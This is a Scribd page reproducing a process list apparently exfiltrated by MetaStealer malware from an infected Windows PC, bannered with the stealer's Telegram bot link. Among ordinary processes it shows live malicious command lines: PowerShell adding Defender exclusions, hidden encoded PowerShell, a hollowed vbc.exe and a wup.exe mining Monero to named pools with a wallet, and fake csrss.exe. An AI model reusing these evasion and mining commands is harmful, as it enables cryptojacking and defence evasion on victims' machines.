Scribd Logo
Upload

Welcome to Scribd!

  • Process List

    Uploaded by

    blackcaliber44
    14 views6 pages

    Original Title

    ProcessList

    Copyright

    © © All Rights Reserved

    Available Formats

    TXT, PDF, TXT or read online from Scribd

    Did you find this document useful?

    Is this content inappropriate?

    Report this Document

    Copyright:

    © All Rights Reserved
    Download as TXT, PDF, TXT or read online from Scribd
    Flag for inappropriate content
    14 views6 pages

    Process List

    Uploaded by

    blackcaliber44

    Copyright:

    © All Rights Reserved
    Download as TXT, PDF, TXT or read online from Scribd
    Flag for inappropriate content
    of 6

    ***********************************************

    * _ _ _ _ *
    * / \ / \ / \ / \ *
    * ( M | E | T | A ) *
    * \_/ \_/ \_/ \_/ *
    * *
    * Telegram: https://t.me/metastealer_bot *
    ***********************************************

    ID: 740, Name: csrss.exe, CommandLine:


    ===============
    ID: 800, Name: winlogon.exe, CommandLine: winlogon.exe
    ===============
    ID: 468, Name: fontdrvhost.exe, CommandLine: "fontdrvhost.exe"
    ===============
    ID: 1196, Name: dwm.exe, CommandLine: "dwm.exe"
    ===============
    ID: 4176, Name: sihost.exe, CommandLine: sihost.exe
    ===============
    ID: 4156, Name: svchost.exe, CommandLine: C:\Windows\system32\svchost.exe -k
    UnistackSvcGroup -s CDPUserSvc
    ===============
    ID: 3660, Name: svchost.exe, CommandLine: C:\Windows\system32\svchost.exe -k
    UnistackSvcGroup -s WpnUserService
    ===============
    ID: 5128, Name: taskhostw.exe, CommandLine: taskhostw.exe {222A245B-E637-4AE9-A93F-
    A59CA119A75E}
    ===============
    ID: 5372, Name: ctfmon.exe, CommandLine: "ctfmon.exe"
    ===============
    ID: 5804, Name: explorer.exe, CommandLine: C:\Windows\Explorer.EXE
    ===============
    ID: 5932, Name: igfxEM.exe, CommandLine: "C:\Windows\System32\DriverStore\
    FileRepository\cui_dch.inf_amd64_38cfab2b652e4701\igfxEM.exe"
    ===============
    ID: 6096, Name: svchost.exe, CommandLine: C:\Windows\system32\svchost.exe -k
    ClipboardSvcGroup -p -s cbdhsvc
    ===============
    ID: 6620, Name: StartMenuExperienceHost.exe, CommandLine: "C:\Windows\SystemApps\
    Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\
    StartMenuExperienceHost.exe" -
    ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
    ===============
    ID: 6792, Name: RuntimeBroker.exe, CommandLine: C:\Windows\System32\
    RuntimeBroker.exe -Embedding
    ===============
    ID: 7012, Name: SearchApp.exe, CommandLine: "C:\Windows\SystemApps\
    Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -
    ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
    ===============
    ID: 6304, Name: RuntimeBroker.exe, CommandLine: C:\Windows\System32\
    RuntimeBroker.exe -Embedding
    ===============
    ID: 4596, Name: RuntimeBroker.exe, CommandLine: C:\Windows\System32\
    RuntimeBroker.exe -Embedding
    ===============
    ID: 6048, Name: SecurityHealthSystray.exe, CommandLine: "C:\Windows\System32\
    SecurityHealthSystray.exe"
    ===============
    ID: 8152, Name: OneDrive.exe, CommandLine: "C:\Users\ASUS\AppData\Local\Microsoft\
    OneDrive\OneDrive.exe" /background
    ===============
    ID: 5840, Name: Discord.exe, CommandLine: "C:\Users\ASUS\AppData\Local\Discord\app-
    1.0.9012\Discord.exe"
    ===============
    ID: 7232, Name: ShellExperienceHost.exe, CommandLine: "C:\Windows\SystemApps\
    ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe" -
    ServerName:App.AppXtk181tbxbce2qsex02s8tw7hfxa9xb3t.mca
    ===============
    ID: 8120, Name: Discord.exe, CommandLine: C:\Users\ASUS\AppData\Local\Discord\app-
    1.0.9012\Discord.exe --type=crashpad-handler --user-data-dir=C:\Users\ASUS\AppData\
    Roaming\discord /prefetch:7 --no-rate-limit --monitor-self-
    annotation=ptype=crashpad-handler --database=C:\Users\ASUS\AppData\Roaming\discord\
    Crashpad --url=https://sentry.io/api/146342/minidump/?
    sentry_key=384ce4413de74fe0be270abe03b2b35a "--annotation=_companyName=Discord
    Inc." --annotation=_productName=Discord --annotation=_version=1.0.9012 --
    annotation=plat=Win32 --annotation=prod=Electron --annotation=ver=22.3.2 --initial-
    client-data=0x49c,0x480,0x414,0x498,0x410,0x85aef78,0x85aef88,0x85aef94
    ===============
    ID: 7296, Name: IDMan.exe, CommandLine: "C:\Program Files (x86)\Internet Download
    Manager\IDMan.exe" /onboot
    ===============
    ID: 8352, Name: RuntimeBroker.exe, CommandLine: C:\Windows\System32\
    RuntimeBroker.exe -Embedding
    ===============
    ID: 8580, Name: Discord.exe, CommandLine: "C:\Users\ASUS\AppData\Local\Discord\app-
    1.0.9012\Discord.exe" --type=gpu-process --user-data-dir="C:\Users\ASUS\AppData\
    Roaming\discord" --gpu-
    preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAA
    AAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAA
    AOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-
    handle=1780 --field-trial-
    handle=1796,i,7767546970753870870,4083573489537264221,131072 --disable-
    features=HardwareMediaKeyHandling,MediaSessionService,SpareRendererForSitePerProces
    s,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2
    ===============
    ID: 8768, Name: Discord.exe, CommandLine: "C:\Users\ASUS\AppData\Local\Discord\app-
    1.0.9012\Discord.exe" --type=utility --utility-sub-
    type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-
    data-dir="C:\Users\ASUS\AppData\Roaming\discord" --mojo-platform-channel-
    handle=2200 --field-trial-
    handle=1796,i,7767546970753870870,4083573489537264221,131072 --disable-
    features=HardwareMediaKeyHandling,MediaSessionService,SpareRendererForSitePerProces
    s,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8
    ===============
    ID: 9304, Name: RtkAudUService64.exe, CommandLine: C:\Windows\System32\
    RtkAudUService64.exe -background
    ===============
    ID: 8684, Name: Discord.exe, CommandLine: "C:\Users\ASUS\AppData\Local\Discord\app-
    1.0.9012\Discord.exe" --type=renderer --user-data-dir="C:\Users\ASUS\AppData\
    Roaming\discord" --app-user-model-id=com.squirrel.Discord.Discord --app-path="C:\
    Users\ASUS\AppData\Local\Discord\app-1.0.9012\resources\app.asar" --no-sandbox --
    no-zygote --autoplay-policy=no-user-gesture-required --lang=en-US --device-scale-
    factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-
    client-id=5 --time-ticks-at-unix-epoch=-1681893985127383 --launch-time-
    ticks=59915891 --mojo-platform-channel-handle=3476 --field-trial-
    handle=1796,i,7767546970753870870,4083573489537264221,131072 --disable-
    features=HardwareMediaKeyHandling,MediaSessionService,SpareRendererForSitePerProces
    s,WinRetrieveSuggestionsOnlyOnDemand --enable-node-leakage-in-renderers /prefetch:1
    ===============
    ID: 10672, Name: java.exe, CommandLine: C:\Users\ASUS\AppData\Roaming\Java\jre8\
    bin\java.exe --expose-gc C:\Users\ASUS\AppData\Roaming\Java\jre8\bin\java.exe:jnl
    ===============
    ID: 11100, Name: TextInputHost.exe, CommandLine: "C:\Windows\SystemApps\
    MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe" -
    ServerName:InputApp.AppX9jnwykgrccxc8by3hsrsh07r423xzvav.mca
    ===============
    ID: 9112, Name: Discord.exe, CommandLine: "C:\Users\ASUS\AppData\Local\Discord\app-
    1.0.9012\Discord.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --
    lang=en-US --service-sandbox-type=audio --user-data-dir="C:\Users\ASUS\AppData\
    Roaming\discord" --mojo-platform-channel-handle=2648 --field-trial-
    handle=1796,i,7767546970753870870,4083573489537264221,131072 --disable-
    features=HardwareMediaKeyHandling,MediaSessionService,SpareRendererForSitePerProces
    s,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8
    ===============
    ID: 10924, Name: svchost.exe, CommandLine: C:\Windows\system32\svchost.exe -k
    UnistackSvcGroup
    ===============
    ID: 9092, Name: LockApp.exe, CommandLine: "C:\Windows\SystemApps\
    Microsoft.LockApp_cw5n1h2txyewy\LockApp.exe" -
    ServerName:WindowsDefaultLockScreen.AppX7y4nbzq37zn4ks9k7amqjywdat7d3j2z.mca
    ===============
    ID: 392, Name: RuntimeBroker.exe, CommandLine: C:\Windows\System32\
    RuntimeBroker.exe -Embedding
    ===============
    ID: 2848, Name: CompPkgSrv.exe, CommandLine: C:\Windows\System32\CompPkgSrv.exe -
    Embedding
    ===============
    ID: 4888, Name: RtkUWP.exe, CommandLine: "C:\Program Files\WindowsApps\
    RealtekSemiconductorCorp.RealtekAudioControl_1.1.137.0_x64__dt26b99r8h8gj\
    RtkUWP.exe" -ServerName:App.AppX2vzv616czv2j97f46vn25b5ksjvhr8z1.mca
    ===============
    ID: 2004, Name: ApplicationFrameHost.exe, CommandLine: C:\Windows\system32\
    ApplicationFrameHost.exe -Embedding
    ===============
    ID: 7996, Name: RuntimeBroker.exe, CommandLine: C:\Windows\System32\
    RuntimeBroker.exe -Embedding
    ===============
    ID: 5712, Name: wpscloudsvr.exe, CommandLine: "C:\Users\ASUS\AppData\Local\
    Kingsoft\WPS Office\11.2.0.11516\office6\wpscloudsvr.exe" /wpscloudlaunch
    /run_plugin /plugin_name=ktaskschdtool /plugin_entry=ktaskschdtool.dll
    /task=wpsexternal /launchtask /ver=1.0 /start_from=task_external
    ===============
    ID: 5012, Name: mstsca.exe, CommandLine: C:\Users\ASUS\AppData\Roaming\Microsoft\
    Network\mstsca.exe
    ===============
    ID: 6548, Name: wpscenter.exe, CommandLine: "C:\Users\ASUS\AppData\Local\Kingsoft\
    WPS Office\11.2.0.11516\office6/wpscenter.exe" Run -Entry=EntryPoint "C:\Users\
    ASUS\AppData\Roaming\Kingsoft/wps/addons/pool/win-i386/kdocreminder_1.1.2021.65/
    kdocreminder.dll"
    ===============
    ID: 4712, Name: 3A56.exe, CommandLine: C:\Users\ASUS\AppData\Local\f46f4670-506e-
    4b11-84f8-99261ddf6dc7\3A56.exe --Task
    ===============
    ID: 8464, Name: powershell.exe, CommandLine: "powershell" -Command Add-
    MpPreference -ExclusionPath 'C:\ProgramData'
    ===============
    ID: 4756, Name: conhost.exe, CommandLine: \??\C:\Windows\system32\conhost.exe 0x4
    ===============
    ID: 8524, Name: explorer.exe, CommandLine: C:\Windows\SysWOW64\explorer.exe
    ===============
    ID: 10396, Name: explorer.exe, CommandLine: C:\Windows\explorer.exe
    ===============
    ID: 4892, Name: explorer.exe, CommandLine: C:\Windows\SysWOW64\explorer.exe
    ===============
    ID: 668, Name: explorer.exe, CommandLine: C:\Windows\explorer.exe
    ===============
    ID: 8344, Name: explorer.exe, CommandLine: C:\Windows\SysWOW64\explorer.exe
    ===============
    ID: 11252, Name: explorer.exe, CommandLine: C:\Windows\SysWOW64\explorer.exe
    ===============
    ID: 6764, Name: explorer.exe, CommandLine: C:\Windows\SysWOW64\explorer.exe
    ===============
    ID: 4580, Name: explorer.exe, CommandLine: C:\Windows\explorer.exe
    ===============
    ID: 6588, Name: explorer.exe, CommandLine: C:\Windows\SysWOW64\explorer.exe
    ===============
    ID: 2744, Name: vbc.exe, CommandLine: C:\Windows\Microsoft.NET\Framework64\
    v4.0.30319\vbc.exe -o xmr-eu1.nanopool.org:14433 -u
    4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5
    vWtANQoBJqYKAGMEQrLE8L8 --tls --coin monero
    ===============
    ID: 7360, Name: WBGRGV.exe, CommandLine: C:\ProgramData\portableWin\WBGRGV.exe
    ===============
    ID: 9088, Name: powershell.exe, CommandLine: "powershell" -Command Add-
    MpPreference -ExclusionPath 'C:\ProgramData'
    ===============
    ID: 5584, Name: conhost.exe, CommandLine: \??\C:\Windows\system32\conhost.exe 0x4
    ===============
    ID: 8160, Name: RegSvcs.exe, CommandLine: "C:\Windows\Microsoft.NET\Framework\
    v4.0.30319\RegSvcs.exe"
    ===============
    ID: 6148, Name: smartscreen.exe, CommandLine: C:\Windows\System32\smartscreen.exe -
    Embedding
    ===============
    ID: 1324, Name: koPamCs_vM7jHvyfackwRCVE.exe, CommandLine: "C:\Users\ASUS\Pictures\
    Minor Policy\koPamCs_vM7jHvyfackwRCVE.exe"
    ===============
    ID: 10920, Name: koPamCs_vM7jHvyfackwRCVE.exe, CommandLine: "C:\Users\ASUS\
    Pictures\Minor Policy\koPamCs_vM7jHvyfackwRCVE.exe"
    ===============
    ID: 6660, Name: lttZ9ZMSNstwv47LDDLSi0EM.exe, CommandLine: "C:\Users\ASUS\Pictures\
    Minor Policy\lttZ9ZMSNstwv47LDDLSi0EM.exe"
    ===============
    ID: 9872, Name: lttZ9ZMSNstwv47LDDLSi0EM.exe, CommandLine: "C:\Users\ASUS\Pictures\
    Minor Policy\lttZ9ZMSNstwv47LDDLSi0EM.exe"
    ===============
    ID: 1316, Name: AppLaunch.exe, CommandLine: "C:\\Windows\\Microsoft.NET\\
    Framework\\v4.0.30319\\AppLaunch.exe"
    ===============
    ID: 9568, Name: AppLaunch.exe, CommandLine: "C:\\Windows\\Microsoft.NET\\
    Framework\\v4.0.30319\\AppLaunch.exe"
    ===============
    ID: 5524, Name: node.exe, CommandLine: node.exe node.lib 3956101466505 1929564397
    ===============
    ID: 8308, Name: HxTsr.exe, CommandLine: "C:\Program Files\WindowsApps\
    microsoft.windowscommunicationsapps_16005.14326.21374.0_x64__8wekyb3d8bbwe\
    HxTsr.exe" -ServerName:Hx.IPC.Server
    ===============
    ID: 9752, Name: RuntimeBroker.exe, CommandLine: C:\Windows\System32\
    RuntimeBroker.exe -Embedding
    ===============
    ID: 11124, Name: powershell.exe, CommandLine: C:\Windows\System32\
    WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand
    cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZAB
    lAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
    ===============
    ID: 5996, Name: powershell.exe, CommandLine: C:\Windows\System32\WindowsPowerShell\
    v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand
    cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZAB
    lAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
    ===============
    ID: 6596, Name: conhost.exe, CommandLine: \??\C:\Windows\system32\conhost.exe 0x4
    ===============
    ID: 9156, Name: conhost.exe, CommandLine: \??\C:\Windows\system32\conhost.exe 0x4
    ===============
    ID: 244, Name: wnb70KIsW65hvwPVbukgwPFK.exe, CommandLine: "C:\Users\ASUS\Pictures\
    Minor Policy\wnb70KIsW65hvwPVbukgwPFK.exe"
    ===============
    ID: 7892, Name: is-O532D.tmp, CommandLine: "C:\Users\ASUS\AppData\Local\Temp\is-
    BEIKE.tmp\is-O532D.tmp" /SL4 $C02C6 "C:\Users\ASUS\Pictures\Minor Policy\
    wnb70KIsW65hvwPVbukgwPFK.exe" 2562561 56320
    ===============
    ID: 11468, Name: powershell.exe, CommandLine: C:\Windows\System32\
    WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand
    cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZAB
    lAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
    ===============
    ID: 11964, Name: conhost.exe, CommandLine: \??\C:\Windows\system32\conhost.exe 0x4
    ===============
    ID: 13012, Name: taskhostw.exe, CommandLine: taskhostw.exe
    ===============
    ID: 4172, Name: chrome.exe, CommandLine: "C:\Program Files (x86)\Google\Chrome\
    Application\chrome.exe" --restore-last-session
    ===============
    ID: 6132, Name: chrome.exe, CommandLine: "C:\Program Files (x86)\Google\Chrome\
    Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\ASUS\
    AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-
    annotation=ptype=crashpad-handler "--database=C:\Users\ASUS\AppData\Local\Google\
    Chrome\User Data\Crashpad" --url=https://clients2.google.com/cr/report --
    annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --
    annotation=ver=112.0.5615.122 --initial-client-
    data=0xe8,0x188,0x1c4,0xe4,0x1c8,0x7ffafcdeaa60,0x7ffafcdeaa70,0x7ffafcdeaa80
    ===============
    ID: 10716, Name: conhost.exe, CommandLine: \??\C:\Windows\system32\conhost.exe 0x4
    ===============
    ID: 5332, Name: conhost.exe, CommandLine: \??\C:\Windows\system32\conhost.exe 0x4
    ===============
    ID: 4560, Name: conhost.exe, CommandLine: \??\C:\Windows\system32\conhost.exe 0x4
    ===============
    ID: 5152, Name: chrome.exe, CommandLine: "C:\Program Files (x86)\Google\Chrome\
    Application\chrome.exe" --type=gpu-process --gpu-
    preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAA
    AAAAAAAAAAAAAABgAAAAAAAAAGAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-
    platform-channel-handle=1900 --field-trial-
    handle=1980,i,3186326931205788530,10113752326107017979,131072 /prefetch:2
    ===============
    ID: 10016, Name: chrome.exe, CommandLine: "C:\Program Files (x86)\Google\Chrome\
    Application\chrome.exe" --type=utility --utility-sub-
    type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-
    platform-channel-handle=2160 --field-trial-
    handle=1980,i,3186326931205788530,10113752326107017979,131072 /prefetch:8
    ===============
    ID: 4200, Name: wup.exe, CommandLine: C:\Users\ASUS\AppData\Local\Temp\csrss\wup\
    xarch\wup.exe -o dxpools.net:40001 --rig-id 170aff50-3414-460e-ac6b-4ab10e102304 --
    tls --nicehash -o dxpools.net:443 --rig-id 170aff50-3414-460e-ac6b-4ab10e102304 --
    tls --nicehash -o dxpools.net:80 --rig-id 170aff50-3414-460e-ac6b-4ab10e102304 --
    nicehash --http-port 3433 --http-access-token 170aff50-3414-460e-ac6b-4ab10e102304
    --randomx-wrmsr=-1
    ===============
    ID: 12468, Name: csrss.exe, CommandLine: C:\Windows\rss\csrss.exe -hide 4200

    You might also like